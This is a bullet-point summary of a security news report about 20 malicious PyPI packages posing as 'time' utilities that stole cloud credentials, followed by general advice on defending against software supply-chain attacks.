ONE SENTENCE SUMMARY:

A malicious campaign targeted PyPI users with fake “time” utilities to steal cloud credentials, affecting thousands of downloads before removal.

MAIN POINTS:

Cybercriminals uploaded 20 malicious Python packages to PyPI, masquerading as “time”-related utilities.
These packages were designed to steal sensitive cloud access tokens from affected users.
The campaign resulted in over 14,100 downloads before the packages were removed.
Some packages uploaded data to threat actor infrastructure, while others mimicked cloud client functionalities.
Three packages were dependencies in a popular GitHub project, increasing their reach.
A commit referencing a malicious package dates back to November 8, 2023.
Fortinet discovered thousands of suspicious packages across PyPI and npm with harmful install scripts.
Malicious packages often use external URLs to download payloads or communicate with command-and-control servers.
974 packages were linked to data exfiltration, malware downloads, and other threats.
Monitoring external URLs in package dependencies is critical to preventing exploitation.

Attackers increasingly exploit software supply chains by injecting malicious packages into trusted repositories.
Developers should verify package authenticity before installation to prevent credential theft.
Open-source ecosystems remain vulnerable to dependency hijacking and supply chain attacks.
Continuous monitoring and scrutiny of external URLs in dependencies are essential for security.
Security firms play a vital role in identifying and mitigating emerging threats in package repositories.